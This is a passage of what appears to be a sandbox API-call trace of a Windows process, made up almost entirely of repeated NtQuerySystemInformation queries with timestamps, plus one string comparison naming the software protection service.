(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.224] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0239.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.276] NtQuerySystemInformation (SystemInformationClass=0xb9, 